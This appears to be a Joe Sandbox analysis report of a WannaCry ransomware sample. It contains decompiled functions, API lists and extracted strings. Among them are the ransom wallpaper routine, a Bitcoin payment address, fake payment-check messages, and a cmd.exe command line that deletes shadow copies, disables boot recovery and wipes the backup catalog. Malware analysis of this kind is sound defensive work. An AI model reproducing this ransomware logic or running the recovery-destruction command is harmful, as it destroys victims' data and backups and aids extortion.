                                  				memset( &_v1558, 0, 0x81 << 2);
                                  				asm("stosw");
                                  				_v520 = _t39;
                                  				memset( &_v518, 0, 0x81 << 2);
                                  				asm("stosw");
                                  				__imp__SHGetFolderPathW(0, 0, 0, 0,  &_v1040, _t42); // executed
                                  				_t23 = wcslen( &_v1060);
                                  				_t54 =  &_v1560 + 0x28;
                                  				if(_t23 != 0) {
                                  					_push(L"@WanaDecryptor@.bmp");
                                  					swprintf( &_v1580, L"%s\\%s",  &_v1060);
                                  					_t55 = _t54 + 0x10;
                                  					MultiByteToWideChar(0, 0, "b.wnry", 0xffffffff,  &_v540, 0x103);
                                  					CopyFileW( &_v540, _t55, 0); // executed
                                  					return SystemParametersInfoW(0x14, 0, _t55, 1);
                                  				} else {
                                  					return _t23;
                                  				}
                                  			}

                                  APIs
                                  • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00407EE6
                                  • wcslen.MSVCRT ref: 00407EF4
                                  • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.bmp), ref: 00407F20
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,b.wnry,000000FF,?,00000103), ref: 00407F41
                                  • CopyFileW.KERNELBASE(?,?,00000000), ref: 00407F56
                                  • SystemParametersInfoW.USER32(00000014,00000000,?,00000001), ref: 00407F67
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCopyFileFolderInfoMultiParametersPathSystemWideswprintfwcslen
                                  • String ID: %s\%s$@WanaDecryptor@.bmp$b.wnry
                                  • API String ID: 13424474-2236924158
                                  • Opcode ID: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
                                  • Instruction ID: 08a18ced9c3675786ff634b79335ab73d5ba80fa93599351ce40df3d96d25247
                                  • Opcode Fuzzy Hash: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
                                  • Instruction Fuzzy Hash: 7E21F075204304BAE36087A4CC05FE773AAAFD4700F508938B359961E1EAB16154875B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E00406C20(void* __ecx) {
                                  				void _v51;
                                  				void* _v52;
                                  				signed int _t14;
                                  				long _t17;
                                  				void* _t26;
                                  				char* _t30;
                                  				unsigned int _t36;
                                  				signed int _t37;
                                  				void* _t55;
                                  
                                  				_t26 = __ecx;
                                  				_v52 = 0;
                                  				memset( &_v51, 0, 0xc << 2);
                                  				asm("stosb");
                                  				_t14 = GetUserDefaultLangID();
                                  				_t30 =  &_v52;
                                  				if(GetLocaleInfoA(_t14 & 0x0000ffff, 0x1001, _t30, 0x32) == 0) {
                                  					asm("repne scasb");
                                  					_t36 =  !(_t30 | 0xffffffff);
                                  					_t55 = "English" - _t36;
                                  					_t37 = _t36 >> 2;
                                  					memcpy(_t55 + _t37 + _t37, _t55, memcpy( &_v52, _t55, _t37 << 2) & 0x00000003);
                                  				}
                                  				_t17 = SendMessageA( *(_t26 + 0x80), 0x158, 0,  &_v52); // executed
                                  				if(_t17 != 0xffffffff) {
                                  					SendMessageA( *(_t26 + 0x80), 0x14d, 0,  &_v52); // executed
                                  					return E00406AE0(_t26);
                                  				} else {
                                  					SendMessageA( *(_t26 + 0x80), 0x14e, 0, 0);
                                  					return E00406AE0(_t26);
                                  				}
                                  			}













                                  APIs
                                  • GetUserDefaultLangID.KERNEL32 ref: 00406C3B
                                  • GetLocaleInfoA.KERNEL32(00000000,00001001,00000000,00000032), ref: 00406C53
                                  • SendMessageA.USER32(?,00000158,00000000,00000000), ref: 00406C9A
                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00406CB1
                                  • SendMessageA.USER32(?,0000014D,00000000,00000000), ref: 00406CD4
                                    • Part of subcall function 00406AE0: #540.MFC42(?,765920C0), ref: 00406B03
                                    • Part of subcall function 00406AE0: #3874.MFC42 ref: 00406B1B
                                    • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B29
                                    • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406B41
                                    • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406B59
                                    • Part of subcall function 00406AE0: #800.MFC42(?,?,765920C0), ref: 00406B62
                                    • Part of subcall function 00406AE0: #800.MFC42 ref: 00406B73
                                    • Part of subcall function 00406AE0: GetFileAttributesA.KERNELBASE(?), ref: 00406B7D
                                    • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B91
                                    • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406BA9
                                    • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406BBB
                                    • Part of subcall function 00406AE0: #800.MFC42(?,?,?,?,?,765920C0), ref: 00406BC4
                                    • Part of subcall function 00406AE0: #800.MFC42 ref: 00406BD5
                                    • Part of subcall function 00406AE0: #800.MFC42(?), ref: 00406BF5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$MessageSend$#537#924sprintf$#3874#540AttributesDefaultFileInfoLangLocaleUser
                                  • String ID: English
                                  • API String ID: 600832625-3812506524
                                  • Opcode ID: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
                                  • Instruction ID: 12cb8a10269d81aa60d086da51d7e65d8080bc449a50ca3d57c6290c1d86febe
                                  • Opcode Fuzzy Hash: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
                                  • Instruction Fuzzy Hash: F911D3717402006BEB149634DC42BAB7795EBD4720F54863EFE5AEB2D0D9F8A8098794
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 87 4064d0-40651b #4710 SendMessageA * 2 call 401c70 90 406577-40658a call 401a10 87->90 91 40651d-40655b GetModuleFileNameA strrchr 87->91 96 4065e8-406609 call 402c40 __p___argc 90->96 97 40658c-4065e5 time call 401a10 90->97 92 40656c-406571 SetCurrentDirectoryA 91->92 93 40655d-406569 strrchr 91->93 92->90 93->92 103 40678c-4067ef call 407e80 SetWindowTextW call 406f80 call 406c20 SetTimer * 2 96->103 104 40660f-40661e __p___argv 96->104 97->96 106 406621-406629 104->106 107 406649-40664b 106->107 108 40662b-40662d 106->108 112 40664e-406650 107->112 110 406645-406647 108->110 111 40662f-406639 108->111 110->112 111->107 114 40663b-406643 111->114 115 406661-40666a __p___argv 112->115 116 406652-40665b call 407f80 ExitProcess 112->116 114->106 114->110 119 40666d-406675 115->119 122 406695-406697 119->122 123 406677-406679 119->123 125 40669a-40669c 122->125 126 406691-406693 123->126 127 40667b-406685 123->127 128 4066ad-4066b6 __p___argv 125->128 129 40669e-4066a7 call 4080c0 ExitProcess 125->129 126->125 127->122 130 406687-40668f 127->130 132 4066b9-4066c1 128->132 130->119 130->126 134 4066e1-4066e3 132->134 135 4066c3-4066c5 132->135 138 4066e6-4066e8 134->138 136 4066c7-4066d1 135->136 137 4066dd-4066df 135->137 136->134 139 4066d3-4066db 136->139 137->138 138->103 140 4066ee-406736 Sleep call 401bb0 138->140 139->132 139->137 143 406750-406781 sprintf call 401a90 140->143 144 406738-40674e call 401b50 140->144 149 406784-406786 ExitProcess 143->149 144->149
                                  C-Code - Quality: 71%
                                  			E004064D0(intOrPtr __ecx, void* __fp0) {
                                  				char _v1032;
                                  				char _v1424;
                                  				void _v2256;
                                  				void _v2456;
                                  				void _v2707;
                                  				char _v2708;
                                  				intOrPtr _v2720;
                                  				short _v2724;
                                  				int _t48;
                                  				int _t49;
                                  				intOrPtr* _t50;
                                  				intOrPtr _t60;
                                  				intOrPtr _t63;
                                  				intOrPtr _t66;
                                  				short _t70;
                                  				void* _t82;
                                  				char* _t87;
                                  				char* _t89;
                                  				intOrPtr _t90;
                                  				intOrPtr _t98;
                                  				intOrPtr _t99;
                                  				intOrPtr _t100;
                                  				intOrPtr _t105;
                                  				char _t122;
                                  				intOrPtr _t134;
                                  				intOrPtr _t135;
                                  				intOrPtr _t136;
                                  				intOrPtr* _t140;
                                  				intOrPtr* _t141;
                                  				intOrPtr* _t142;
                                  				intOrPtr* _t161;
                                  				intOrPtr* _t162;
                                  				intOrPtr* _t163;
                                  				void* _t165;
                                  				void* _t167;
                                  				intOrPtr* _t168;
                                  				void* _t169;
                                  				void* _t170;
                                  				void* _t171;
                                  				void* _t201;
                                  
                                  				_t201 = __fp0;
                                  				_t90 = __ecx; // executed
                                  				L00412CB0(); // executed
                                  				SendMessageA( *(__ecx + 0x20), 0x80, 1,  *(__ecx + 0x82c)); // executed
                                  				SendMessageA( *(_t90 + 0x20), 0x80, 0,  *(_t90 + 0x82c)); // executed
                                  				_t48 = E00401C70(0);
                                  				_t170 = _t169 + 4;
                                  				if(_t48 == 0) {
                                  					_t122 =  *0x421798; // 0x0
                                  					_v2708 = _t122;
                                  					memset( &_v2707, _t48, 0x40 << 2);
                                  					asm("stosw");
                                  					asm("stosb");
                                  					GetModuleFileNameA(0,  &_v2708, 0x104);
                                  					_t87 = strrchr( &_v2708, 0x5c);
                                  					_t170 = _t170 + 0x14;
                                  					if(_t87 != 0) {
                                  						_t89 = strrchr( &_v2708, 0x5c);
                                  						_t170 = _t170 + 8;
                                  						 *_t89 = 0;
                                  					}
                                  					SetCurrentDirectoryA( &_v2708);
                                  				}
                                  				_t167 = _t90 + 0x50c;
                                  				_t49 = E00401A10(_t167, 1);
                                  				_t171 = _t170 + 8;
                                  				if(_t49 == 0) {
                                  					memset(_t167, _t49, 0xc3 << 2);
                                  					asm("repne scasb");
                                  					_t165 = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94";
                                  					_t82 = memcpy(_t165 + 0x175b75a, _t165, memcpy(_t90 + 0x5be, _t165, 0 << 2) & 0x00000003);
                                  					 *((intOrPtr*)(_t90 + 0x584)) = 0x43960000;
                                  					 *(_t90 + 0x588) = 0;
                                  					__imp__time(0);
                                  					 *(_t90 + 0x578) = _t82;
                                  					E00401A10(_t167, 0);
                                  					_t171 = _t171 + 0x30;
                                  				}
                                  				_t50 = E00402C40();
                                  				__imp__#115(0x202,  &_v1424); // executed
                                  				__imp____p___argc();
                                  				if( *_t50 > 1) {
                                  					_t168 = __imp____p___argv;
                                  					_t140 = "fi";
                                  					_t161 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
                                  					while(1) {
                                  						_t98 =  *_t161;
                                  						_t60 = _t98;
                                  						if(_t98 !=  *_t140) {
                                  							break;
                                  						}
                                  						if(_t60 == 0) {
                                  							L12:
                                  							_t60 = 0;
                                  						} else {
                                  							_t136 =  *((intOrPtr*)(_t161 + 1));
                                  							_t22 = _t140 + 1; // 0x31000069
                                  							_t60 = _t136;
                                  							if(_t136 !=  *_t22) {
                                  								break;
                                  							} else {
                                  								_t161 = _t161 + 2;
                                  								_t140 = _t140 + 2;
                                  								if(_t60 != 0) {
                                  									continue;
                                  								} else {
                                  									goto L12;
                                  								}
                                  							}
                                  						}
                                  						L14:
                                  						if(_t60 == 0) {
                                  							E00407F80(_t90);
                                  							ExitProcess(0);
                                  						}
                                  						_t141 = "co";
                                  						_t162 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
                                  						while(1) {
                                  							_t99 =  *_t162;
                                  							_t63 = _t99;
                                  							if(_t99 !=  *_t141) {
                                  								break;
                                  							}
                                  							if(_t63 == 0) {
                                  								L21:
                                  								_t63 = 0;
                                  							} else {
                                  								_t135 =  *((intOrPtr*)(_t162 + 1));
                                  								_t25 = _t141 + 1; // 0x6600006f
                                  								_t63 = _t135;
                                  								if(_t135 !=  *_t25) {
                                  									break;
                                  								} else {
                                  									_t162 = _t162 + 2;
                                  									_t141 = _t141 + 2;
                                  									if(_t63 != 0) {
                                  										continue;
                                  									} else {
                                  										goto L21;
                                  									}
                                  								}
                                  							}
                                  							L23:
                                  							if(_t63 == 0) {
                                  								E004080C0(_t90);
                                  								ExitProcess(0);
                                  							}
                                  							_t142 = "vs";
                                  							_t163 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
                                  							while(1) {
                                  								_t100 =  *_t163;
                                  								_t66 = _t100;
                                  								if(_t100 !=  *_t142) {
                                  									break;
                                  								}
                                  								if(_t66 == 0) {
                                  									L30:
                                  									_t66 = 0;
                                  								} else {
                                  									_t134 =  *((intOrPtr*)(_t163 + 1));
                                  									_t28 = _t142 + 1; // 0x63000073
                                  									_t66 = _t134;
                                  									if(_t134 !=  *_t28) {
                                  										break;
                                  									} else {
                                  										_t163 = _t163 + 2;
                                  										_t142 = _t142 + 2;
                                  										if(_t66 != 0) {
                                  											continue;
                                  										} else {
                                  											goto L30;
                                  										}
                                  									}
                                  								}
                                  								L32:
                                  								if(_t66 == 0) {
                                  									Sleep(0x2710);
                                  									memset( &_v2256, memcpy( &_v2456, "/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet", 0x32 << 2), 0xce << 2);
                                  									_t70 = "cmd.exe"; // 0x2e646d63
                                  									_t105 =  *0x420fd4; // 0x657865
                                  									_v2724 = _t70;
                                  									_v2720 = _t105;
                                  									if(E00401BB0() != 0) {
                                  										_push( &_v2456);
                                  										_push( &_v2724);
                                  										sprintf( &_v1032, "%s %s");
                                  										E00401A90( &_v1032, 0, 0);
                                  									} else {
                                  										E00401B50( &_v2724,  &_v2456, _t71);
                                  									}
                                  									ExitProcess(0);
                                  								}
                                  								goto L37;
                                  							}
                                  							asm("sbb eax, eax");
                                  							asm("sbb eax, 0xffffffff");
                                  							goto L32;
                                  						}
                                  						asm("sbb eax, eax");
                                  						asm("sbb eax, 0xffffffff");
                                  						goto L23;
                                  					}
                                  					asm("sbb eax, eax");
                                  					asm("sbb eax, 0xffffffff");
                                  					goto L14;
                                  				}
                                  				L37:
                                  				E00407E80();
                                  				SetWindowTextW( *(_t90 + 0x20), L"Wana Decrypt0r 2.0"); // executed
                                  				E00406F80(_t90, _t201);
                                  				E00406C20(_t90);
                                  				SetTimer( *(_t90 + 0x20), 0x3e9, 0x3e8, 0); // executed
                                  				SetTimer( *(_t90 + 0x20), 0x3ea, 0x7530, 0); // executed
                                  				 *0x42189c = _t90;
                                  				return 1;
                                  			}












































                                  APIs
                                  • #4710.MFC42 ref: 004064DC
                                  • SendMessageA.USER32(?,00000080,00000001,?), ref: 004064F9
                                  • SendMessageA.USER32(?,00000080,00000000,?), ref: 0040650D
                                    • Part of subcall function 00401C70: wcscat.MSVCRT ref: 00401CC1
                                    • Part of subcall function 00401C70: RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
                                    • Part of subcall function 00401C70: GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
                                    • Part of subcall function 00401C70: RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
                                    • Part of subcall function 00401C70: RegCloseKey.KERNELBASE(00000000), ref: 00401DA3
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406541
                                  • strrchr.MSVCRT ref: 00406554
                                  • strrchr.MSVCRT ref: 00406564
                                  • SetCurrentDirectoryA.KERNEL32(?), ref: 00406571
                                  • time.MSVCRT ref: 004065D1
                                  • __p___argc.MSVCRT(00000202,?), ref: 004065FA
                                  • __p___argv.MSVCRT ref: 0040661A
                                  • ExitProcess.KERNEL32 ref: 0040665B
                                  • __p___argv.MSVCRT ref: 00406666
                                  • ExitProcess.KERNEL32 ref: 004066A7
                                  • __p___argv.MSVCRT ref: 004066B2
                                  • Sleep.KERNEL32(00002710), ref: 004066F3
                                  • sprintf.MSVCRT ref: 0040676A
                                  • ExitProcess.KERNEL32 ref: 00406786
                                  • SetWindowTextW.USER32(?,Wana Decrypt0r 2.0), ref: 0040679C
                                  • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004067C6
                                  • SetTimer.USER32(?,000003EA,00007530,00000000), ref: 004067D8
                                  Strings
                                  • /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, xrefs: 004066FE
                                  • cmd.exe, xrefs: 0040671C
                                  • %s %s, xrefs: 00406764
                                  • 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94, xrefs: 00406595
                                  • Wana Decrypt0r 2.0, xrefs: 00406796
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess__p___argv$CurrentDirectoryMessageSendTimerstrrchr$#4710CloseCreateFileModuleNameSleepTextValueWindow__p___argcsprintftimewcscat
                                  • String ID: %s %s$/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet$13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94$Wana Decrypt0r 2.0$cmd.exe
                                  • API String ID: 623806192-606506946
                                  • Opcode ID: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
                                  • Instruction ID: 76468553a1f47653d6b265dfd970fa21b418b24b97d30d9546a7e2687b9e40c0
                                  • Opcode Fuzzy Hash: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
                                  • Instruction Fuzzy Hash: 72816C35704301ABD7109F309C41BEB7B95AF99304F15493AFD4AAB3D1DA7AE8188B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 150 401760-40178f #6453 151 401791-4017b2 WaitForSingleObject TerminateThread CloseHandle 150->151 152 4017b8-4017c3 call 40c670 150->152 151->152 155 4017c9-4017d2 152->155 156 40193e-401955 152->156 157 4018f6-4018f9 155->157 158 4017d8-40182e sprintf fopen 155->158 161 4018fb-401901 157->161 162 40192c-40192f 157->162 159 401834-4018d8 fread fclose DeleteFileA #537 #924 #1200 #800 * 2 158->159 160 4018da-4018f4 #1200 158->160 159->156 160->156 163 401903-401913 rand 161->163 164 40191f-40192a 161->164 162->156 165 401931-401934 162->165 163->164 166 401915-40191d 163->166 167 401939 #1200 164->167 165->167 166->167 167->156
                                  C-Code - Quality: 61%
                                  			E00401760(void* __ecx) {
                                  				int _v8;
                                  				intOrPtr _v12;
                                  				char _v20;
                                  				struct _IO_FILE* _v32;
                                  				void _v2059;
                                  				void _v2060;
                                  				void _v2571;
                                  				void _v2572;
                                  				char _v2576;
                                  				char _v2604;
                                  				void* _v2608;
                                  				char _v2616;
                                  				void* _v2636;
                                  				void* _v2640;
                                  				void* _t36;
                                  				struct _IO_FILE* _t37;
                                  				signed int _t38;
                                  				unsigned int _t45;
                                  				signed int _t49;
                                  				void* _t50;
                                  				signed int _t67;
                                  				struct _IO_FILE* _t87;
                                  				void* _t94;
                                  				void* _t97;
                                  				intOrPtr _t98;
                                  				void* _t99;
                                  
                                  				_push(0xffffffff);
                                  				_push(E004134C6);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t98;
                                  				_t99 = _t98 - 0xa28;
                                  				_t94 = __ecx;
                                  				L00412CD4();
                                  				_t36 =  *(__ecx + 0xac);
                                  				if(_t36 != 0) {
                                  					WaitForSingleObject(_t36, 0xbb8);
                                  					TerminateThread( *(_t94 + 0xac), 0); // executed
                                  					CloseHandle( *(_t94 + 0xac));
                                  				}
                                  				_t37 = E0040C670();
                                  				if( *((intOrPtr*)(_t94 + 0xb4)) != 0) {
                                  					L15:
                                  					 *[fs:0x0] = _v12;
                                  					return _t37;
                                  				} else {
                                  					_t37 =  *(_t94 + 0xa8);
                                  					if(_t37 != 1) {
                                  						if(_t37 != 0xffffffff) {
                                  							if(_t37 != 2) {
                                  								goto L15;
                                  							}
                                  							_push(0);
                                  							_push(0x40);
                                  							_push("Congratulations! Your payment has been checked!\nStart decrypting now!"); // executed
                                  							L14:
                                  							L00412CC8(); // executed
                                  							goto L15;
                                  						}
                                  						if( *((intOrPtr*)(_t94 + 0xa0)) == 0) {
                                  							L11:
                                  							_push(0);
                                  							_push(0xf0);
                                  							_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
                                  							goto L14;
                                  						}
                                  						_t38 = rand();
                                  						asm("cdq");
                                  						_t37 = _t38 / 3;
                                  						if(_t38 % 3 != 0) {
                                  							goto L11;
                                  						}
                                  						_push(0);
                                  						_push(0x30);
                                  						_push("Failed to check your payment!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
                                  						goto L14;
                                  					}
                                  					_v2572 = 0;
                                  					memset( &_v2571, 0, 0x7f << 2);
                                  					asm("stosw");
                                  					asm("stosb");
                                  					_v2060 = 0;
                                  					memset( &_v2059, 0, 0x1ff << 2);
                                  					asm("stosw");
                                  					asm("stosb");
                                  					sprintf( &_v2604, "%08X.dky", 0);
                                  					_t37 = fopen( &_v2604, "rb");
                                  					_t87 = _t37;
                                  					_t99 = _t99 + 0x2c;
                                  					if(_t87 == 0) {
                                  						_push(0);
                                  						_push(0xf0);
                                  						_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
                                  						L00412CC8();
                                  						 *(_t94 + 0xa8) = 0xffffffff;
                                  					} else {
                                  						_t45 = fread( &_v2060, 1, 0x800, _t87);
                                  						fclose(_t87);
                                  						DeleteFileA( &_v2604);
                                  						_t97 =  &_v2060;
                                  						_t67 = _t45 >> 2;
                                  						_t49 = memcpy( &_v2572, _t97, _t67 << 2);
                                  						_push("You have a new message:\n");
                                  						_t50 = memcpy(_t97 + _t67 + _t67, _t97, _t49 & 0x00000003);
                                  						_t99 = _t99 + 0x2c;
                                  						L00412CAA();
                                  						_push( &_v2576);
                                  						_push(_t50);
                                  						_push( &_v2616);
                                  						_v8 = 0;
                                  						L00412CCE();
                                  						_t37 =  *_t50;
                                  						_push(0);
                                  						_push(0x40);
                                  						_push(_t37);
                                  						_v20 = 1;
                                  						L00412CC8();
                                  						_v32 = 0;
                                  						L00412CC2();
                                  						_v32 = 0xffffffff;
                                  						L00412CC2();
                                  					}
                                  					goto L15;
                                  				}
                                  			}

                                  APIs
                                  • #6453.MFC42 ref: 00401780
                                  • WaitForSingleObject.KERNEL32(?,00000BB8), ref: 00401797
                                  • TerminateThread.KERNELBASE(?,00000000), ref: 004017A5
                                  • CloseHandle.KERNEL32(?), ref: 004017B2
                                  • sprintf.MSVCRT ref: 00401811
                                  • fopen.MSVCRT ref: 00401821
                                  • fread.MSVCRT ref: 00401844
                                  • fclose.MSVCRT ref: 0040184D
                                  • DeleteFileA.KERNEL32(?), ref: 0040185B
                                  • #537.MFC42(You have a new message:), ref: 00401885
                                  • #924.MFC42(?,00000000,?,You have a new message:), ref: 0040189C
                                  • #1200.MFC42 ref: 004018AF
                                  • #800.MFC42 ref: 004018BF
                                  • #800.MFC42 ref: 004018D3
                                  • #1200.MFC42(You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.,000000F0,00000000), ref: 004018E5
                                  Strings
                                  • Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 00401918
                                  • Congratulations! Your payment has been checked!Start decrypting now!, xrefs: 00401934
                                  • %08X.dky, xrefs: 0040180A
                                  • You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday., xrefs: 004018E0, 00401925
                                  • You have a new message:, xrefs: 00401877
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #1200#800$#537#6453#924CloseDeleteFileHandleObjectSingleTerminateThreadWaitfclosefopenfreadsprintf
                                  • String ID: %08X.dky$Congratulations! Your payment has been checked!Start decrypting now!$Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.$You have a new message:
                                  • API String ID: 2207195628-1375496427
                                  • Opcode ID: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
                                  • Instruction ID: 8b94a0d45af64711c1f2f56a46f7a966efbefe6460f93d7d0814001cf74dce0a
                                  • Opcode Fuzzy Hash: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
                                  • Instruction Fuzzy Hash: 1D41F371244740EFC330DB64C895BEB7699AB85710F404A3EF25AA32E0DABC5944CB6B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 54%
                                  			E004012E0(void* __ecx) {
                                  				int _v4;
                                  				intOrPtr _v12;
                                  				void _v2059;
                                  				void _v2060;
                                  				void _v2192;
                                  				void _v2196;
                                  				intOrPtr _v2324;
                                  				void _v2328;
                                  				void _v2332;
                                  				char _v2364;
                                  				char _v2396;
                                  				char _v2436;
                                  				char _v2468;
                                  				char _v2508;
                                  				char _v2540;
                                  				intOrPtr _t61;
                                  				long _t65;
                                  				struct _IO_FILE* _t68;
                                  				struct _IO_FILE* _t76;
                                  				struct _IO_FILE* _t83;
                                  				int _t85;
                                  				intOrPtr _t88;
                                  				struct _IO_FILE* _t91;
                                  				int _t97;
                                  				void* _t100;
                                  				char* _t123;
                                  				void _t131;
                                  				struct _IO_FILE* _t143;
                                  				struct _IO_FILE* _t146;
                                  				struct _IO_FILE* _t149;
                                  				void* _t154;
                                  				signed int _t156;
                                  				signed int _t157;
                                  				intOrPtr _t161;
                                  				void* _t164;
                                  				void* _t166;
                                  				void* _t169;
                                  				void* _t172;
                                  
                                  				_push(0xffffffff);
                                  				_push(E004134A6);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t161;
                                  				_t61 =  *0x42189c; // 0x19f608
                                  				_push(_t156);
                                  				_t154 = __ecx;
                                  				_t3 = _t61 + 0x50c; // 0x19fb14
                                  				_t100 = _t3;
                                  				sprintf( &_v2468, "%08X.pky",  *((intOrPtr*)(__ecx + 0xa4)));
                                  				sprintf( &_v2540, "%08X.dky",  *((intOrPtr*)(_t154 + 0xa4)));
                                  				_t164 = _t161 - 0x9e0 + 0x18;
                                  				_t65 = GetFileAttributesA( &_v2540); // executed
                                  				_t157 = _t156 | 0xffffffff;
                                  				if(_t65 == _t157) {
                                  					L4:
